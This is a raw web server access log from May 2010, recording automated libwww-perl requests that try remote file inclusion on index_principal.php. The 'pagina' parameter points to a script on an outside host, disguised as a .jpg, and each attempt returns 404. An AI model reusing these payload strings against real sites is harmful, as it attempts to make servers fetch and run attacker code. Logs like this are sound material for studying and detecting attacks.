91.103.220.36 - - [11/May/2010:03:59:49 -0500] "GET //index_principal.php?pagina=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
91.103.220.36 - - [11/May/2010:03:59:49 -0500] "GET /logs//index_principal.php?pagina=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
216.129.119.14 - - [11/May/2010:04:00:00 -0500] "GET /logs/access_log.1241049600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
72.29.80.127 - - [11/May/2010:04:00:27 -0500] "GET /logs/access_log.1270857600//index_principal.php?pagina=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
72.29.80.127 - - [11/May/2010:04:00:27 -0500] "GET //index_principal.php?pagina=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
72.29.80.127 - - [11/May/2010:04:00:27 -0500] "GET /logs//index_principal.php?pagina=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
